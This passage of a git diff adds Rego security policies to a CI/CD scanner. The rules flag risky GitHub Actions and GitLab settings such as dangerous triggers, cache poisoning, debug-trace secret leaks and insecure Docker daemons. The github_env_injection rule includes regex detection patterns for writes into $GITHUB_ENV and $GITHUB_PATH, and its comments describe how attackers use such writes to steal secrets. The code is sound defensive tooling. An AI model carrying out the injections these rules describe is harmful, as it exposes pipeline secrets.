+_non_compliant_reasons[branch.name] contains reason if {
+ branch := input.pipeline.branches[_]
+ cur := object.get(branch, "minPushAccessLevel", 0)
+ cur != 0
+ min := object.get(input.config.branchMustBeProtected, "minPushAccessLevel", 0)
+ _access_level_violates(min, cur)
+ reason := sprintf("Push access level is too low (%d, minimum: %d)", [cur, min])
+}
+
+# Policy = 0 ("No one allowed") is the strictest setting; any non-zero branch
+# level is by definition more permissive.
+_access_level_violates(min, _) if min == 0
+
+_access_level_violates(min, cur) if {
+ min > 0
+ min > cur
+}
diff --git a/policies/branch_unprotected.rego b/policies/branch_unprotected.rego
new file mode 100644
index 0000000..202cabb
--- /dev/null
+++ b/policies/branch_unprotected.rego
@@ -0,0 +1,33 @@
+# branch-unprotected β flag repository branches whose name matches a
+# protection requirement set in .plumber.yaml (either one of the
+# declared namePatterns or the project's default branch when
+# defaultMustBeProtected is on) but for which the provider reports no
+# matching branch-protection rule.
+package branch_unprotected
+
+import rego.v1
+
+deny contains finding if {
+ some i
+ branch := input.pipeline.branches[i]
+ branch.protected == false
+ _branch_must_be_protected(branch.name)
+ finding := {
+ "code": "ISSUE-501",
+ "severity": "critical",
+ "message": sprintf("branch %q must be protected", [branch.name]),
+ "job": branch.name,
+ "type": "unprotected",
+ "branchName": branch.name,
+ }
+}
+
+_branch_must_be_protected(name) if {
+ input.config.branchMustBeProtected.defaultMustBeProtected
+ name == input.pipeline.defaultBranch
+}
+
+_branch_must_be_protected(name) if {
+ some pattern in input.config.branchMustBeProtected.namePatterns
+ glob.match(pattern, null, name)
+}
diff --git a/policies/cache_poisoning.rego b/policies/cache_poisoning.rego
new file mode 100644
index 0000000..d45658f
--- /dev/null
+++ b/policies/cache_poisoning.rego
@@ -0,0 +1,107 @@
+# cache-poisoning β flag release / publish jobs that prime a build
+# cache via actions/cache (or the language-specific setup-* action's
+# built-in cache) without an explicit release-scoped key. GitHub
+# Actions caches are shared across branches with permissive fallback:
+# a PR run on a feature branch can populate the same cache key that
+# a later release-triggered job restores, silently injecting
+# compromised artefacts into the published output.
+#
+# "Release context" here is any job whose workflow triggers include
+# `release`, `push` with a tag filter (implicit via the `v*` pattern
+# cache setups commonly key on), `workflow_dispatch` with a release
+# intent, or that references `publish`, `release`, `build-release`
+# semantics in scripts. The collector only surfaces the trigger
+# names so the policy focuses on `release` + `push` triggers β the
+# most common vectors.
+package cache_poisoning
+
+import rego.v1
+
+cache_actions := {
+ "actions/cache",
+ "actions/cache/restore",
+ "gradle/actions/setup-gradle",
+ "actions/setup-node",
+ "actions/setup-go",
+ "actions/setup-python",
+ "actions/setup-java",
+ "pnpm/action-setup",
+}
+
+deny contains finding if {
+ some i, j
+ job := input.pipeline.jobs[i]
+ _is_release_context(job)
+ action := job.uses[j]
+ _uses_cache_action(action.uses)
+ not _key_is_release_scoped(action)
+ finding := {
+ "code": "ISSUE-106",
+ "severity": "high",
+ "message": sprintf("job %q restores a cache via %q on a release-type trigger β scope the key to the release ref or disable caching on publish paths", [job.name, action.uses]),
+ "job": job.name,
+ "line": object.get(action, "line", 0),
+ }
+}
+
+_is_release_context(job) if {
+ some t in job.triggers
+ t == "release"
+}
+
+# Workflows that run a canonical publish action on a job β even under
+# push/workflow_dispatch triggers β are still release-intent. Those
+# actions lift the built artifact out of the runner; a poisoned cache
+# restore before they execute lands straight on the registry.
+_is_release_context(job) if {
+ some k
+ action := job.uses[k]
+ _is_publish_action(action.uses)
+}
+
+publish_actions := {
+ "pypa/gh-action-pypi-publish",
+ "JS-DevTools/npm-publish",
+ "gradle/publish-plugin",
+ "softprops/action-gh-release",
+ "ncipollo/release-action",
+ "goreleaser/goreleaser-action",
+ "crazy-max/ghaction-docker-buildx",
+}
+
+_is_publish_action(uses) if {
+ some prefix in publish_actions
+ startswith(uses, sprintf("%s@", [prefix]))
+}
+
+_is_publish_action(uses) if {
+ some prefix in publish_actions
+ uses == prefix
+}
+
+_uses_cache_action(uses) if {
+ some prefix in cache_actions
+ startswith(uses, sprintf("%s@", [prefix]))
+}
+
+_uses_cache_action(uses) if {
+ some prefix in cache_actions
+ uses == prefix
+}
+
+# A release-scoped key references the ref, tag, or release version.
+# Looks for the canonical github.ref* / github.event.release.* /
+# tag / version tokens inside the key string. The check is
+# deliberately lenient β anything that weaves the ref into the key
+# breaks the cross-branch fallback.
+_key_is_release_scoped(action) if {
+ key := action.with.key
+ is_string(key)
+ regex.match(`github\.(ref(_name)?|sha|event\.release|event\.pull_request\.head\.sha)`, key)
+}
+
+_key_is_release_scoped(action) if {
+ key := action.with.key
+ is_string(key)
+ regex.match(`\$\{\{\s*github\.ref`, key)
+}
diff --git a/policies/component_missing.rego b/policies/component_missing.rego
new file mode 100644
index 0000000..8b75d41
--- /dev/null
+++ b/policies/component_missing.rego
@@ -0,0 +1,61 @@
+# component-missing β flag pipelines that do not include every CI/CD
+# component required by the user's
+# pipelineMustIncludeComponent.requiredGroups policy. The list is in
+# DNF (Disjunctive Normal Form): a group is an AND, the outer slice is
+# an OR. One finding is emitted per missing component per group so the
+# report explains exactly which slot stayed empty β the Go control
+# behaves the same way.
+package component_missing
+
+import rego.v1
+
+deny contains finding if {
+ input.config.pipelineMustIncludeComponent
+ groups := input.config.pipelineMustIncludeComponent.requiredGroups
+ count(groups) > 0
+ not _any_group_satisfied(groups)
+ some i, j
+ group := groups[i]
+ required := group[j]
+ not _component_present(required)
+ finding := {
+ "code": "ISSUE-408",
+ "severity": "high",
+ "message": sprintf("required component %q is missing from the pipeline (group %d)", [required, i]),
+ "job": required,
+ }
+}
+
+# A DNF group is satisfied when every required component in it is
+# present. The whole policy is satisfied as soon as ANY group is β
+# that's the OR of the outer slice.
+_any_group_satisfied(groups) if {
+ some i
+ group := groups[i]
+ count(group) > 0
+ every required in group {
+ _component_present(required)
+ }
+}
+
+_component_present(required) if {
+ some k
+ inc := input.pipeline.includes[k]
+ inc.kind == "component"
+ _paths_match(inc, required)
+}
+
+_paths_match(inc, required) if {
+ inc.path != ""
+ inc.path == required
+}
+
+_paths_match(inc, required) if {
+ inc.altPath != ""
+ inc.altPath == required
+}
+
+_paths_match(inc, required) if {
+ inc.source != ""
+ inc.source == required
+}
diff --git a/policies/component_overridden.rego b/policies/component_overridden.rego
new file mode 100644
index 0000000..29ab080
--- /dev/null
+++ b/policies/component_overridden.rego
@@ -0,0 +1,44 @@
+# component-overridden β flag pipelines that import a required CI/CD
+# component but redefine some of its jobs with forbidden CI/CD keys
+# (script, image, rules, β¦). Overriding a required component locally
+# silently defeats the compliance intent: the job name is still there,
+# but its behaviour is no longer the component's behaviour. The match
+# set comes from pipelineMustIncludeComponent.requiredGroups; the
+# overridden-job list is populated by the collector.
+package component_overridden
+
+import rego.v1
+
+deny contains finding if {
+ input.config.pipelineMustIncludeComponent
+ groups := input.config.pipelineMustIncludeComponent.requiredGroups
+ count(groups) > 0
+ some i, j, k
+ group := groups[i]
+ required := group[j]
+ inc := input.pipeline.includes[k]
+ inc.kind == "component"
+ _paths_match(inc, required)
+ count(inc.overriddenJobs) > 0
+ finding := {
+ "code": "ISSUE-409",
+ "severity": "high",
+ "message": sprintf("required component %q is imported but %d of its job(s) are overridden locally", [required, count(inc.overriddenJobs)]),
+ "job": required,
+ }
+}
+
+_paths_match(inc, required) if {
+ inc.path != ""
+ inc.path == required
+}
+
+_paths_match(inc, required) if {
+ inc.altPath != ""
+ inc.altPath == required
+}
+
+_paths_match(inc, required) if {
+ inc.source != ""
+ inc.source == required
+}
diff --git a/policies/container_hardcoded_credentials.rego b/policies/container_hardcoded_credentials.rego
new file mode 100644
index 0000000..10bb475
--- /dev/null
+++ b/policies/container_hardcoded_credentials.rego
@@ -0,0 +1,36 @@
+# container-hardcoded-credentials β flag GitHub Actions job containers
+# whose `credentials.password` is a literal string instead of a
+# `${{ secrets.X }}` reference. A literal password ends up in git
+# history in plain text β anyone with read access to the repository can
+# retrieve it, and rotating means rewriting history on every clone.
+#
+# The collector forwards the raw YAML value of credentials.password on
+# the IR image. Template expressions (`${{ secrets.DOCKER_PASS }}`) pass
+# through as-is β they are recognisable by the surrounding `${{ }}`.
+package container_hardcoded_credentials
+
+import rego.v1
+
+deny contains finding if {
+ some i
+ job := input.pipeline.jobs[i]
+ pw := job.image.credentialsPassword
+ pw != ""
+ not _is_expression(pw)
+ finding := {
+ "code": "ISSUE-105",
+ "severity": "critical",
+ "message": sprintf("job %q sets container.credentials.password to a literal value β use ${{ secrets.* }} instead", [job.name]),
+ "job": job.name,
+ }
+}
+
+# _is_expression is true when the password value contains a GitHub
+# Actions template expression. A bare `${{ }}` without an enclosed
+# reference is technically also a literal (it would evaluate to an
+# empty string) but the policy doesn't try to catch that micro-case β
+# the interesting signal is the literal-password footprint.
+_is_expression(value) if {
+ contains(value, "${{")
+ contains(value, "}}")
+}
diff --git a/policies/dangerous_triggers.rego b/policies/dangerous_triggers.rego
new file mode 100644
index 0000000..c3018f7
--- /dev/null
+++ b/policies/dangerous_triggers.rego
@@ -0,0 +1,39 @@
+# dangerous-triggers β flag pipeline jobs reachable through a GitHub
+# Actions trigger that combines attacker-controlled input with
+# privileged secrets. The two primary offenders are:
+#
+# - pull_request_target: runs with the base repo's secrets AND token
+# while being trivially influenceable by an unprivileged PR author.
+# - workflow_run: triggered by the completion of another workflow,
+# likewise secret-bearing regardless of the source workflow's
+# trust boundary.
+#
+# Severity is intentionally "critical". In March 2025 the
+# tj-actions/changed-files compromise (CVE-2025-30066) exploited
+# exactly this pattern β pull_request_target plus an explicit checkout
+# of the PR head β and exfiltrated secrets from hundreds of projects,
+# including aquasecurity/trivy. The finding flags the attack surface
+# whether or not the workflow checks out fork code today: the moment a
+# later edit introduces such a checkout, secrets leak, and the trigger
+# is the prerequisite that makes the pivot possible.
+#
+# Finer-grained risk signals (explicit fork checkout, script injection
+# from `github.event.*`) can be added in follow-up iterations.
+package dangerous_triggers
+
+import rego.v1
+
+dangerous_events := {"pull_request_target", "workflow_run"}
+
+deny contains finding if {
+ some i, j
+ job := input.pipeline.jobs[i]
+ trigger := job.triggers[j]
+ dangerous_events[trigger]
+ finding := {
+ "code": "ISSUE-414",
+ "severity": "critical",
+ "message": sprintf("job %q is reachable via the dangerous trigger %q", [job.name, trigger]),
+ "job": job.name,
+ }
+}
diff --git a/policies/debug_trace.rego b/policies/debug_trace.rego
new file mode 100644
index 0000000..23ab34e
--- /dev/null
+++ b/policies/debug_trace.rego
@@ -0,0 +1,60 @@
+# debug-trace β flag pipeline jobs that enable CI debug tracing. When
+# CI_DEBUG_TRACE=true (or the newer CI_DEBUG_SERVICES=true) is set,
+# GitLab Runner prints every environment variable, including masked
+# secrets, to the job log β a well-documented secret-leak path.
+#
+# Parity with the legacy Go control (controlGitlabPipelineDebugTrace.go):
+# - Variable name comparison is case-insensitive.
+# - Truthy values are `true`, `1`, `yes` (case-insensitive, trimmed).
+# - The control is a no-op unless the user populates
+# `pipelineMustNotEnableDebugTrace.forbiddenVariables` in
+# .plumber.yaml β there is no built-in default list. This matches
+# the legacy GetConf path that disables the control when the
+# forbiddenVariables list is empty.
+package debug_trace
+
+import rego.v1
+
+deny contains finding if {
+ count(input.config.debugTrace.forbiddenVariables) > 0
+ some i
+ job := input.pipeline.jobs[i]
+ some var_name in input.config.debugTrace.forbiddenVariables
+ some k, v in job.variables
+ upper(k) == upper(var_name)
+ _is_truthy(v)
+ finding := {
+ "code": "ISSUE-203",
+ "severity": "critical",
+ "message": sprintf("%s = %q (job %q)", [k, v, job.name]),
+ "job": job.name,
+ "variableName": k,
+ "value": v,
+ "location": job.name,
+ }
+}
+
+# Pipeline-level globals (`variables:` at the top of .gitlab-ci.yml)
+# apply to every job, so emit one finding for the pipeline rather than
+# duplicating per job.
+deny contains finding if {
+ count(input.config.debugTrace.forbiddenVariables) > 0
+ some var_name in input.config.debugTrace.forbiddenVariables
+ some k, v in input.pipeline.globalVariables
+ upper(k) == upper(var_name)
+ _is_truthy(v)
+ finding := {
+ "code": "ISSUE-203",
+ "severity": "critical",
+ "message": sprintf("%s = %q (global variables)", [k, v]),
+ "variableName": k,
+ "value": v,
+ "location": "global",
+ }
+}
+
+_is_truthy(v) if lower(trim_space(v)) == "true"
+
+_is_truthy(v) if lower(trim_space(v)) == "1"
+
+_is_truthy(v) if lower(trim_space(v)) == "yes"
diff --git a/policies/dependabot_insecure_exec.rego b/policies/dependabot_insecure_exec.rego
new file mode 100644
index 0000000..5838f9b
--- /dev/null
+++ b/policies/dependabot_insecure_exec.rego
@@ -0,0 +1,25 @@
+# dependabot-insecure-exec β flag repositories whose .github/
+# dependabot.yml sets `insecure-external-code-execution: allow` on
+# any update ecosystem. That toggle lets Dependabot run install /
+# postinstall hooks from arbitrary candidate dependency versions
+# during version resolution, giving any compromised upstream package
+# a direct path into the privileged Dependabot runner.
+#
+# The collector surfaces the list of ecosystems with the toggle set
+# to allow; if that slice is non-empty, we emit one finding per
+# ecosystem so the remediation wording can name which one is wrong.
+package dependabot_insecure_exec
+
+import rego.v1
+
+deny contains finding if {
+ input.pipeline.dependabot
+ some i
+ ecosystem := input.pipeline.dependabot.insecureExecEcosystems[i]
+ finding := {
+ "code": "ISSUE-606",
+ "severity": "critical",
+ "message": sprintf("dependabot ecosystem %q re-enables insecure-external-code-execution β set it back to `deny` or remove the override", [ecosystem]),
+ "file": input.pipeline.dependabot.path,
+ }
+}
diff --git a/policies/dependabot_missing_cooldown.rego b/policies/dependabot_missing_cooldown.rego
new file mode 100644
index 0000000..6aa3f0a
--- /dev/null
+++ b/policies/dependabot_missing_cooldown.rego
@@ -0,0 +1,21 @@
+# dependabot-missing-cooldown β flag update ecosystems in
+# .github/dependabot.yml that have no `cooldown:` window. Without a
+# cooldown, Dependabot opens a PR the instant a new upstream version
+# is published β including the minute-old release that a compromised
+# maintainer just pushed. The security advisory pipeline needs hours
+# / days to flag a bad release; a cooldown buys exactly that window.
+package dependabot_missing_cooldown
+
+import rego.v1
+
+deny contains finding if {
+ input.pipeline.dependabot
+ some i
+ ecosystem := input.pipeline.dependabot.missingCooldownEcosystems[i]
+ finding := {
+ "code": "ISSUE-607",
+ "severity": "low",
+ "message": sprintf("dependabot ecosystem %q has no cooldown window β a compromised upstream release would reach an auto-merge PR immediately", [ecosystem]),
+ "file": input.pipeline.dependabot.path,
+ }
+}
diff --git a/policies/dependency_update_tool_missing.rego b/policies/dependency_update_tool_missing.rego
new file mode 100644
index 0000000..6ae13a0
--- /dev/null
+++ b/policies/dependency_update_tool_missing.rego
@@ -0,0 +1,27 @@
+# dependency-update-tool-missing β flag repositories with workflows
+# but without any dependency-update tool configured. A project that
+# pins its dependencies (which every sane workflow does via
+# `actions/checkout@` etc.) then has no automation to refresh
+# those pins as upstream ships patches, and every unpatched CVE
+# stays in place until a human remembers to look.
+#
+# Satisfied by either `.github/dependabot.yml` (any shape) or a
+# Renovate config at a conventional path. The collector populates
+# `Dependabot` and `RenovateConfigPath` accordingly.
+package dependency_update_tool_missing
+
+import rego.v1
+
+deny contains finding if {
+ input.pipeline.provider == "github"
+ count(input.pipeline.jobs) > 0
+ not input.pipeline.dependabot
+ not input.pipeline.renovateConfigPath
+ first_file := input.pipeline.jobs[0].originFile
+ finding := {
+ "code": "ISSUE-608",
+ "severity": "medium",
+ "message": "repository has workflows but neither dependabot.yml nor renovate.json is configured β dependency pins will drift and stale CVEs will persist",
+ "file": first_file,
+ }
+}
diff --git a/policies/docker_in_docker.rego b/policies/docker_in_docker.rego
new file mode 100644
index 0000000..682c574
--- /dev/null
+++ b/policies/docker_in_docker.rego
@@ -0,0 +1,60 @@
+# docker-in-docker β flag CI/CD jobs that attach a Docker-in-Docker
+# (dind) service. Running a Docker daemon inside a CI container on
+# shared runners in privileged mode enables container escape and
+# cross-job secret exfiltration. The upstream GitLab documentation
+# now recommends Kaniko or Buildah for container builds instead.
+#
+# Parity with the legacy Go control (controlGitlabPipelineDockerInDocker.go):
+# - The image must be the `docker` image (registry-prefixed names
+# such as `registry.gitlab.com/group/docker:dind` are accepted β
+# only the trailing path segment matters).
+# - The tag must be `dind`, `latest`, or contain `dind`. Bare
+# `docker` (no tag) is intentionally NOT considered dind.
+# - At most one finding per job, mirroring the legacy `break` after
+# the first matched service.
+package docker_in_docker
+
+import rego.v1
+
+deny contains finding if {
+ some i
+ job := input.pipeline.jobs[i]
+ dind := _first_dind_service(job)
+ finding := {
+ "code": "ISSUE-412",
+ "severity": "high",
+ "message": sprintf("job %q uses Docker-in-Docker service %q", [job.name, _image_ref(dind)]),
+ "job": job.name,
+ "serviceImage": _image_ref(dind),
+ }
+}
+
+# _first_dind_service preserves the legacy "first match wins" behaviour
+# so a job with multiple services never produces more than one
+# ISSUE-412 finding.
+_first_dind_service(job) := svc if {
+ matching := [s | some k; s := job.services[k]; _is_dind(s)]
+ count(matching) > 0
+ svc := matching[0]
+}
+
+_is_dind(img) if {
+ _is_docker_name(img.name)
+ img.tag != ""
+ _is_dind_tag(img.tag)
+}
+
+_is_docker_name(name) if lower(name) == "docker"
+
+_is_docker_name(name) if endswith(lower(name), "/docker")
+
+_is_dind_tag(tag) if lower(tag) == "dind"
+
+_is_dind_tag(tag) if lower(tag) == "latest"
+
+_is_dind_tag(tag) if contains(lower(tag), "dind")
+
+_image_ref(img) := ref if {
+ img.tag != ""
+ ref := sprintf("%s:%s", [img.name, img.tag])
+} else := img.name
diff --git a/policies/docker_in_docker_insecure.rego b/policies/docker_in_docker_insecure.rego
new file mode 100644
index 0000000..39de63a
--- /dev/null
+++ b/policies/docker_in_docker_insecure.rego
@@ -0,0 +1,89 @@
+# docker-in-docker-insecure β flag Docker-in-Docker jobs whose daemon
+# configuration is exposed without TLS. Two well-documented unsafe
+# patterns:
+#
+# - DOCKER_TLS_CERTDIR set to the empty string (disables TLS between
+# the Docker client and the daemon).
+# - DOCKER_HOST containing `:2375` (plain TCP daemon endpoint).
+#
+# The policy only fires when a dind service is already present on the
+# job β a daemon that is not shipped with the pipeline cannot leak
+# through these variables. Both job-level and pipeline-level globals
+# are inspected (matching the legacy detectInsecureDaemon helper).
+package docker_in_docker_insecure
+
+import rego.v1
+
+deny contains finding if {
+ some i
+ job := input.pipeline.jobs[i]
+ dind := _first_dind_service(job)
+ _insecure_for_job(job)
+ detail := _insecure_detail(job)
+ finding := {
+ "code": "ISSUE-413",
+ "severity": "critical",
+ "message": sprintf("Job '%s': %s", [job.name, detail]),
+ "job": job.name,
+ "detail": detail,
+ }
+}
+
+_first_dind_service(job) := svc if {
+ matching := [s | some k; s := job.services[k]; _is_dind(s)]
+ count(matching) > 0
+ svc := matching[0]
+}
+
+_is_dind(img) if {
+ _is_docker_name(img.name)
+ img.tag != ""
+ _is_dind_tag(img.tag)
+}
+
+_is_docker_name(name) if lower(name) == "docker"
+
+_is_docker_name(name) if endswith(lower(name), "/docker")
+
+_is_dind_tag(tag) if lower(tag) == "dind"
+
+_is_dind_tag(tag) if lower(tag) == "latest"
+
+_is_dind_tag(tag) if contains(lower(tag), "dind")
+
+_insecure_for_job(job) if _vars_insecure(job.variables)
+
+_insecure_for_job(job) if _vars_insecure(input.pipeline.globalVariables)
+
+_vars_insecure(vars) if {
+ some k, v in vars
+ upper(k) == "DOCKER_TLS_CERTDIR"
+ trim_space(v) == ""
+}
+
+_vars_insecure(vars) if {
+ some k, v in vars
+ upper(k) == "DOCKER_HOST"
+ contains(v, ":2375")
+}
+
+_insecure_detail(job) := detail if {
+ detail := _detail_for_vars(job.variables)
+} else := detail if {
+ detail := _detail_for_vars(input.pipeline.globalVariables)
+} else := "insecure daemon configuration detected"
+
+_detail_for_vars(vars) := "DOCKER_TLS_CERTDIR set to empty string disables TLS" if {
+ some k, v in vars
+ upper(k) == "DOCKER_TLS_CERTDIR"
+ trim_space(v) == ""
+} else := sprintf("DOCKER_HOST=%q exposes the daemon over plain TCP (port 2375)", [v]) if {
+ some k, v in vars
+ upper(k) == "DOCKER_HOST"
+ contains(v, ":2375")
+}
+
+_image_ref(img) := ref if {
+ img.tag != ""
+ ref := sprintf("%s:%s", [img.name, img.tag])
+} else := img.name
diff --git a/policies/dockerfile_unpinned_base.rego b/policies/dockerfile_unpinned_base.rego
new file mode 100644
index 0000000..a5dcad1
--- /dev/null
+++ b/policies/dockerfile_unpinned_base.rego
@@ -0,0 +1,46 @@
+# dockerfile-unpinned-base β flag Dockerfile FROM directives that
+# reference a base image without a `@sha256:β¦` digest. Tags are
+# mutable at the registry level: an attacker who compromises the
+# registry β or the image maintainer β can re-push the same tag to
+# point at a different layer, silently injecting code into every
+# later build that pulls the reference. Pinning by digest is the
+# single control that neutralises this vector.
+#
+# The collector scans Dockerfile-shaped files at the repo root and
+# under common build directories (up to two levels deep), parsing
+# each FROM line and recording whether the reference carries a
+# digest. Policy emits one finding per unpinned FROM.
+package dockerfile_unpinned_base
+
+import rego.v1
+
+deny contains finding if {
+ some i, j
+ df := input.pipeline.dockerfiles[i]
+ base := df.bases[j]
+ not base.pinnedByDigest
+ not _is_scratch(base.image)
+ not _is_stage_ref(base.image)
+ finding := {
+ "code": "ISSUE-107",
+ "severity": "medium",
+ "message": sprintf("Dockerfile references base image %q without a @sha256 digest β pin by digest to neutralise registry-side retagging", [base.image]),
+ "file": df.path,
+ "line": base.line,
+ }
+}
+
+# `FROM scratch` has no registry layer β nothing to pin.
+_is_scratch(image) if {
+ image == "scratch"
+}
+
+# `FROM builder` (alias from a previous build stage) is not an
+# external reference; the stage was defined earlier in the same
+# Dockerfile. Heuristic: no `/` and no `:` typically means a
+# single-token alias, not an image ref.
+_is_stage_ref(image) if {
+ not contains(image, "/")
+ not contains(image, ":")
+ not contains(image, "@")
+}
diff --git a/policies/embed.go b/policies/embed.go
new file mode 100644
index 0000000..8461a4a
--- /dev/null
+++ b/policies/embed.go
@@ -0,0 +1,13 @@
+// Package policies exposes the built-in Rego policies shipped with Plumber.
+// The directory contents are embedded at build time via //go:embed. Users
+// can extend or override them at runtime via --policies (Phase 2+).
+package policies
+
+import "embed"
+
+// FS holds every .rego file at the root of the policies/ directory.
+// Nested subdirectories will be picked up once the concern-based layout
+// (policies/image/, policies/pipeline/, ...) is introduced in Phase 2.
+//
+//go:embed *.rego
+var FS embed.FS
diff --git a/policies/excessive_permissions.rego b/policies/excessive_permissions.rego
new file mode 100644
index 0000000..b510ebe
--- /dev/null
+++ b/policies/excessive_permissions.rego
@@ -0,0 +1,23 @@
+# excessive-permissions β flag pipeline jobs whose effective permissions
+# block grants blanket write access. For GitHub Actions this is
+# `permissions: write-all` set either at workflow level (propagated to
+# every job by the collector) or at the job level.
+#
+# Stricter forms (e.g. { contents: read, packages: write }) are out of
+# scope for now β a later iteration may accept a per-rule allow-list of
+# permitted scopes. This policy has no runtime configuration yet.
+package excessive_permissions
+
+import rego.v1
+
+deny contains finding if {
+ some i
+ job := input.pipeline.jobs[i]
+ job.permissions == "write-all"
+ finding := {
+ "code": "ISSUE-509",
+ "severity": "high",
+ "message": sprintf("job %q runs with overly broad permissions: \"write-all\"", [job.name]),
+ "job": job.name,
+ }
+}
diff --git a/policies/github_app_skip_revoke.rego b/policies/github_app_skip_revoke.rego
new file mode 100644
index 0000000..2a22f28
--- /dev/null
+++ b/policies/github_app_skip_revoke.rego
@@ -0,0 +1,55 @@
+# github-app-skip-revoke β flag workflows that mint a GitHub App
+# installation token and disable revocation on exit. The canonical
+# action (`actions/create-github-app-token`) exposes a
+# `skip-token-revoke:` input that defaults to `false`; setting it to
+# `true` keeps the minted token alive long after the workflow
+# terminates. A later leak (log fragment, artefact, cache) then
+# hands the attacker a still-working token with the App's full
+# permission set.
+#
+# The policy matches the `with.skip-token-revoke` input on any step
+# whose `uses:` starts with the canonical app-token actions. Other
+# community actions that follow the same input naming pick up the
+# check for free.
+package github_app_skip_revoke
+
+import rego.v1
+
+token_actions := {
+ "actions/create-github-app-token",
+ "tibdex/github-app-token",
+ "getsentry/action-github-app-token",
+ "peter-murray/workflow-application-token-action",
+}
+
+deny contains finding if {
+ some i, j
+ job := input.pipeline.jobs[i]
+ action := job.uses[j]
+ _is_app_token_action(action.uses)
+ _revocation_disabled(action)
+ finding := {
+ "code": "ISSUE-306",
+ "severity": "high",
+ "message": sprintf("job %q mints a GitHub App token via %q with `skip-token-revoke: true` β the token survives the run and any later leak stays exploitable", [job.name, action.uses]),
+ "job": job.name,
+ }
+}
+
+_is_app_token_action(uses) if {
+ some prefix in token_actions
+ startswith(uses, sprintf("%s@", [prefix]))
+}
+
+_is_app_token_action(uses) if {
+ some prefix in token_actions
+ uses == prefix
+}
+
+_revocation_disabled(action) if {
+ action.with["skip-token-revoke"] == true
+}
+
+_revocation_disabled(action) if {
+ action.with["skip-token-revoke"] == "true"
+}
diff --git a/policies/github_env_injection.rego b/policies/github_env_injection.rego
new file mode 100644
index 0000000..d5d01fb
--- /dev/null
+++ b/policies/github_env_injection.rego
@@ -0,0 +1,64 @@
+# github-env-injection β flag `run:` steps that append user-controlled
+# content to $GITHUB_ENV or $GITHUB_PATH. These two files are sticky:
+# every subsequent step of the job reads the variables/PATH entries
+# they define. An attacker who can influence the appended value
+# (PR title, issue body, fork branch name, ...) can override
+# `NODE_OPTIONS`, front-load a malicious directory on PATH, and hijack
+# later tool invocations β exfiltrating secrets when the workflow runs
+# under a secret-bearing trigger (pull_request_target, workflow_run).
+#
+# The check fires when a script line writes to $GITHUB_ENV or
+# $GITHUB_PATH AND the line contains a GitHub template expression
+# known to carry user input (github.event.*, github.head_ref,
+# github.pull_request.*). The env: binding pattern stays quiet β
+# `echo "VAR=$SAFE_BIND" >> $GITHUB_ENV` with SAFE_BIND coming from
+# an `env:` block is not matched because the expression is not on the
+# same line as the redirect.
+package github_env_injection
+
+import rego.v1
+
+# Expressions GitHub considers attacker-influenceable under fork-based
+# triggers. Same list as the template-injection policy (ISSUE-206);
+# any value under `github.event.*` or `github.head_ref` can be
+# replaced by a PR author.
+unsafe_patterns := [
+ `\${{\s*github\.event\.`,
+ `\${{\s*github\.head_ref\s*}}`,
+ `\${{\s*github\.pull_request\.`,
+]
+
+# sink_patterns are regex patterns matching a shell redirect that
+# writes into one of the two special GitHub files. Covers both the
+# `$GITHUB_ENV` and `${GITHUB_ENV}` forms, plus the rarer `tee`-style
+# variant.
+sink_patterns := [
+ `>>\s*\$\{?GITHUB_ENV\}?`,
+ `>\s*\$\{?GITHUB_ENV\}?`,
+ `>>\s*\$\{?GITHUB_PATH\}?`,
+ `>\s*\$\{?GITHUB_PATH\}?`,
+ `\btee\s+-a\s+\$\{?GITHUB_ENV\}?`,
+ `\btee\s+-a\s+\$\{?GITHUB_PATH\}?`,
+]
+
+deny contains finding if {
+ some i, j
+ job := input.pipeline.jobs[i]
+ script := job.scripts[j]
+ _writes_to_github_file(script)
+ _has_unsafe_expression(script)
+ finding := {
+ "code": "ISSUE-209",
+ "severity": "critical",
+ "message": sprintf("job %q writes a user-controlled template expression into $GITHUB_ENV or $GITHUB_PATH β an attacker can hijack later steps", [job.name]),
+ "job": job.name,
+ }
+}
+
+_writes_to_github_file(line) if {
+ regex.match(sink_patterns[_], line)
+}
+
+_has_unsafe_expression(line) if {
+ regex.match(unsafe_patterns[_], line)
+}
diff --git a/policies/hardcoded_jobs.rego b/policies/hardcoded_jobs.rego
new file mode 100644
index 0000000..5c03c19
--- /dev/null
+++ b/policies/hardcoded_jobs.rego
@@ -0,0 +1,20 @@
+# hardcoded-jobs β flag pipeline jobs defined directly in the project
+# .gitlab-ci.yml instead of sourced from a reviewed include, template
+# or component. Hardcoded jobs escape the approval/versioning flow
+# that governs shared CI assets, making them a common blind spot for
+# supply-chain governance.
+package hardcoded_jobs
+
+import rego.v1
+
+deny contains finding if {
+ some i
+ job := input.pipeline.jobs[i]
+ job.originKind == "hardcoded"
+ finding := {
+ "code": "ISSUE-401",
+ "severity": "medium",
+ "message": sprintf("job %q is hardcoded (not sourced from include/component/template)", [job.name]),
+ "job": job.name,
+ }
+}
diff --git a/policies/image_authorized_sources.rego b/policies/image_authorized_sources.rego
new file mode 100644
index 0000000..a74d3fd
--- /dev/null
+++ b/policies/image_authorized_sources.rego
@@ -0,0 +1,89 @@
+# image-authorized-sources β flag pipeline jobs that pull a container
+# image from a registry not listed in
+# containerImageMustComeFromAuthorizedSources.trustedUrls. Official
+# Docker Hub images (image name without a slash) are accepted
+# implicitly when trustDockerHubOfficialImages is true.
+#
+# Parity with the legacy Go control (controlGitlabImageUntrusted.go):
+# - The "unknown" registry literal emitted by the GitLab image
+# collector is treated the same as no registry (image name only).
+# - Both the image reference and each trustedUrls pattern are
+# normalised so `${VAR}` and `$VAR` compare equal β mirrors the
+# legacy normalizeVarNotation pass.
+# - Glob matching is performed via `glob.match(pat, null, ref)` which
+# mirrors go-wildcard.Match semantics for `*` and `?` patterns.
+package image_authorized_sources
+
+import rego.v1
+
+deny contains finding if {
+ # Only run when the user has declared an authorized-sources policy;
+ # without a config, the rule is effectively disabled.
+ input.config.imageAuthorizedSources
+ some i
+ job := input.pipeline.jobs[i]
+ job.image
+ not _is_authorized(job.image)
+ finding := {
+ "code": "ISSUE-101",
+ "severity": "critical",
+ "message": sprintf("job %q uses image from untrusted source: %s", [job.name, _full_ref(job.image)]),
+ "job": job.name,
+ "link": _full_ref(job.image),
+ "status": "unauthorized",
+ }
+}
+
+_is_authorized(img) if {
+ pattern := input.config.imageAuthorizedSources.trustedUrls[_]
+ glob.match(_normalize_var(pattern), null, _normalize_var(_full_ref(img)))
+}
+
+_is_authorized(img) if {
+ input.config.imageAuthorizedSources.trustDockerHubOfficial == true
+ _is_docker_hub_official(img)
+}
+
+# Legacy treats only single-segment names (no slash) as Docker Hub
+# official. The collector strips the canonical `library/` prefix
+# upstream, so we match that contract literally β a name containing a
